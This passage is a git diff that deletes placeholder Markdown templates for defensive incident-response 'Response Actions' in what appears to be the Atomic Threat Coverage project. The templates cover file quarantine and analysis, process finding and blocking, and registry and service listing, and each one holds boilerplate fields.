-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1314_get_ability_to_quarantine_file_by_format.md b/Atomic_Threat_Coverage/Response_Actions/RA_1314_get_ability_to_quarantine_file_by_format.md
deleted file mode 100644
index 11e286c..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1314_get_ability_to_quarantine_file_by_format.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to quarantine file by format         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1314            |
-| **Description**             | Make sure you have the ability to block a file from being accessed by its format   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1315_get_ability_to_quarantine_file_by_content_pattern.md b/Atomic_Threat_Coverage/Response_Actions/RA_1315_get_ability_to_quarantine_file_by_content_pattern.md
deleted file mode 100644
index d37f510..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1315_get_ability_to_quarantine_file_by_content_pattern.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to quarantine file by content pattern         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1315            |
-| **Description**             | Make sure you have the ability to block a file from being accessed by its content pattern (i.e. specific string, keyword, binary pattern etc)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1316_get_ability_to_remove_file.md b/Atomic_Threat_Coverage/Response_Actions/RA_1316_get_ability_to_remove_file.md
deleted file mode 100644
index 30b4f48..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1316_get_ability_to_remove_file.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to remove file         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1316            |
-| **Description**             | Make sure you have the ability to remove a specific file from a (remote) host or a system   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1317_get_ability_to_analyse_file_hash.md b/Atomic_Threat_Coverage/Response_Actions/RA_1317_get_ability_to_analyse_file_hash.md
deleted file mode 100644
index 5bc9f5e..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1317_get_ability_to_analyse_file_hash.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Get ability to analyse file hash         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1317            |
-| **Description**             | Make sure you have the ability to analyse a file hash   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1318_get_ability_to_analyse_windows_pe.md b/Atomic_Threat_Coverage/Response_Actions/RA_1318_get_ability_to_analyse_windows_pe.md
deleted file mode 100644
index 1cc57d7..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1318_get_ability_to_analyse_windows_pe.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Get ability to analyse Windows PE         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1318            |
-| **Description**             | Make sure you have the ability to analyse a Windows Portable Executable file   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1319_get_ability_to_analyse_macos_macho.md b/Atomic_Threat_Coverage/Response_Actions/RA_1319_get_ability_to_analyse_macos_macho.md
deleted file mode 100644
index f667f67..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1319_get_ability_to_analyse_macos_macho.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Get ability to analyse macos macho         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1319            |
-| **Description**             | Make sure you have the ability to analyse a macOS Mach-O file   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1320_get_ability_to_analyse_unix_elf.md b/Atomic_Threat_Coverage/Response_Actions/RA_1320_get_ability_to_analyse_unix_elf.md
deleted file mode 100644
index cca0be8..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1320_get_ability_to_analyse_unix_elf.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Get ability to analyse Unix ELF         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1320            |
-| **Description**             | Make sure you have the ability to analyse a UNIX ELF file   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1321_get_ability_to_analyse_ms_office_file.md b/Atomic_Threat_Coverage/Response_Actions/RA_1321_get_ability_to_analyse_ms_office_file.md
deleted file mode 100644
index 4cae036..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1321_get_ability_to_analyse_ms_office_file.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Get ability to analyse MS office file         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1321            |
-| **Description**             | Make sure you have the ability to analyse a Microsoft Office file   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1322_get_ability_to_analyse_pdf_file.md b/Atomic_Threat_Coverage/Response_Actions/RA_1322_get_ability_to_analyse_pdf_file.md
deleted file mode 100644
index c0739bf..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1322_get_ability_to_analyse_pdf_file.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Get ability to analyse PDF file         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1322            |
-| **Description**             | Make sure you have the ability to analyse a PDF file   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1323_get_ability_to_analyse_script.md b/Atomic_Threat_Coverage/Response_Actions/RA_1323_get_ability_to_analyse_script.md
deleted file mode 100644
index 679cb4c..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1323_get_ability_to_analyse_script.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Get ability to analyse script         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1323            |
-| **Description**             | Make sure you have the ability to analyse a script file (i.e. Python, PowerShell, Bash scripts etc)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1401_get_ability_to_list_processes_executed.md b/Atomic_Threat_Coverage/Response_Actions/RA_1401_get_ability_to_list_processes_executed.md
deleted file mode 100644
index db90a33..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1401_get_ability_to_list_processes_executed.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to list processes executed         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1401            |
-| **Description**             | Make sure you have the ability to list processes being executed at the moment or at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1402_get_ability_to_find_process_by_executable_path.md b/Atomic_Threat_Coverage/Response_Actions/RA_1402_get_ability_to_find_process_by_executable_path.md
deleted file mode 100644
index c36ba92..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1402_get_ability_to_find_process_by_executable_path.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to find process by executable path         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1402            |
-| **Description**             | Make sure you have the ability to find process executed at a particular time in the past by its executable path (including its name)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1403_get_ability_to_find_process_by_executable_metadata.md b/Atomic_Threat_Coverage/Response_Actions/RA_1403_get_ability_to_find_process_by_executable_metadata.md
deleted file mode 100644
index 710e298..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1403_get_ability_to_find_process_by_executable_metadata.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to find process by executable metadata         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1403            |
-| **Description**             | Make sure you have the ability to find process executed at a particular time in the past by its executable metadata (i.e. signature, permissions, MAC times)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1404_get_ability_to_find_process_by_executable_hash.md b/Atomic_Threat_Coverage/Response_Actions/RA_1404_get_ability_to_find_process_by_executable_hash.md
deleted file mode 100644
index c3e0d2d..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1404_get_ability_to_find_process_by_executable_hash.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to find process by executable hash         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1404            |
-| **Description**             | Make sure you have the ability to find process executed at a particular time in the past by its executable hash   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1405_get_ability_to_find_process_by_executable_format.md b/Atomic_Threat_Coverage/Response_Actions/RA_1405_get_ability_to_find_process_by_executable_format.md
deleted file mode 100644
index 6e64ede..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1405_get_ability_to_find_process_by_executable_format.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to find process by executable format         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1405            |
-| **Description**             | Make sure you have the ability to find process executed at a particular time in the past by its executable format   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1406_get_ability_to_find_process_by_executable_content_pattern.md b/Atomic_Threat_Coverage/Response_Actions/RA_1406_get_ability_to_find_process_by_executable_content_pattern.md
deleted file mode 100644
index 001b9a0..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1406_get_ability_to_find_process_by_executable_content_pattern.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to find process by executable content pattern         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1406            |
-| **Description**             | Make sure you have the ability to find process executed at a particular time in the past by its executable content pattern (i.e. specific string, keyword, binary pattern etc)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1407_get_ability_to_block_process_by_executable_path.md b/Atomic_Threat_Coverage/Response_Actions/RA_1407_get_ability_to_block_process_by_executable_path.md
deleted file mode 100644
index cddb02b..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1407_get_ability_to_block_process_by_executable_path.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to block process by executable path         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1407            |
-| **Description**             | Make sure you have the ability to block process by its executable path (including its name)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1408_get_ability_to_block_process_by_executable_metadata.md b/Atomic_Threat_Coverage/Response_Actions/RA_1408_get_ability_to_block_process_by_executable_metadata.md
deleted file mode 100644
index 27875a8..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1408_get_ability_to_block_process_by_executable_metadata.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to block process by executable metadata         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1408            |
-| **Description**             | Make sure you have the ability to block process by its executable metadata (i.e. signature, permissions, MAC times)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1409_get_ability_to_block_process_by_executable_hash.md b/Atomic_Threat_Coverage/Response_Actions/RA_1409_get_ability_to_block_process_by_executable_hash.md
deleted file mode 100644
index 86507d9..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1409_get_ability_to_block_process_by_executable_hash.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to block process by executable hash         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1409            |
-| **Description**             | Make sure you have the ability to block process by its executable hash   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1410_get_ability_to_block_process_by_executable_format.md b/Atomic_Threat_Coverage/Response_Actions/RA_1410_get_ability_to_block_process_by_executable_format.md
deleted file mode 100644
index 5d49894..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1410_get_ability_to_block_process_by_executable_format.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to block process by executable format         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1410            |
-| **Description**             | Make sure you have the ability to block process by its executable format   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1411_get_ability_to_block_process_by_executable_content_pattern.md b/Atomic_Threat_Coverage/Response_Actions/RA_1411_get_ability_to_block_process_by_executable_content_pattern.md
deleted file mode 100644
index 5094e7b..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1411_get_ability_to_block_process_by_executable_content_pattern.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to block process by executable content pattern         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1411            |
-| **Description**             | Make sure you have the ability to block process by its executable content pattern (i.e. specific string, keyword, binary pattern etc)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1501_manage_remote_computer_management_system_policies.md b/Atomic_Threat_Coverage/Response_Actions/RA_1501_manage_remote_computer_management_system_policies.md
deleted file mode 100644
index cd5d96d..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1501_manage_remote_computer_management_system_policies.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Manage remote computer management system policies         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1501            |
-| **Description**             | Make sure you can manage Remote Computer Management system policies   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1502_get_ability_to_list_registry_keys_modified.md b/Atomic_Threat_Coverage/Response_Actions/RA_1502_get_ability_to_list_registry_keys_modified.md
deleted file mode 100644
index 83d6e9a..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1502_get_ability_to_list_registry_keys_modified.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to list registry keys modified         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1502            |
-| **Description**             | Make sure you have the ability to list registry keys modified at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1503_get_ability_to_list_registry_keys_deleted.md b/Atomic_Threat_Coverage/Response_Actions/RA_1503_get_ability_to_list_registry_keys_deleted.md
deleted file mode 100644
index 87c31c6..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1503_get_ability_to_list_registry_keys_deleted.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to list registry keys deleted         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1503            |
-| **Description**             | Make sure you have the ability to list registry keys deleted at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1504_get_ability_to_list_registry_keys_accessed.md b/Atomic_Threat_Coverage/Response_Actions/RA_1504_get_ability_to_list_registry_keys_accessed.md
deleted file mode 100644
index d541ee2..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1504_get_ability_to_list_registry_keys_accessed.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to list registry keys accessed         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1504            |
-| **Description**             | Make sure you have the ability to list registry keys accessed at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1505_get_ability_to_list_registry_keys_created.md b/Atomic_Threat_Coverage/Response_Actions/RA_1505_get_ability_to_list_registry_keys_created.md
deleted file mode 100644
index 64f036f..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1505_get_ability_to_list_registry_keys_created.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to list registry keys created         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1505            |
-| **Description**             | Make sure you have the ability to list registry keys created at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1506_get_ability_to_list_services_created.md b/Atomic_Threat_Coverage/Response_Actions/RA_1506_get_ability_to_list_services_created.md
deleted file mode 100644
index b0e1ecb..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1506_get_ability_to_list_services_created.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to list services created         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1506            |
-| **Description**             | Make sure you have the ability to list services that have created at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1507_get_ability_to_list_services_modified.md b/Atomic_Threat_Coverage/Response_Actions/RA_1507_get_ability_to_list_services_modified.md
deleted file mode 100644
index eae4b90..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1507_get_ability_to_list_services_modified.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to list services modified         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1507            |
-| **Description**             | Make sure you have the ability to list services that have been modified at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1508_get_ability_to_list_services_deleted.md b/Atomic_Threat_Coverage/Response_Actions/RA_1508_get_ability_to_list_services_deleted.md
deleted file mode 100644
index 09d63ba..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1508_get_ability_to_list_services_deleted.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to list services deleted         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1508            |
-| **Description**             | Make sure you have the ability to list services that have been deleted at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1509_get_ability_to_remove_registry_key.md b/Atomic_Threat_Coverage/Response_Actions/RA_1509_get_ability_to_remove_registry_key.md
deleted file mode 100644
index a95c487..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1509_get_ability_to_remove_registry_key.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to remove registry key         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1509            |
-| **Description**             | Make sure you have the ability to remove a registry key   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
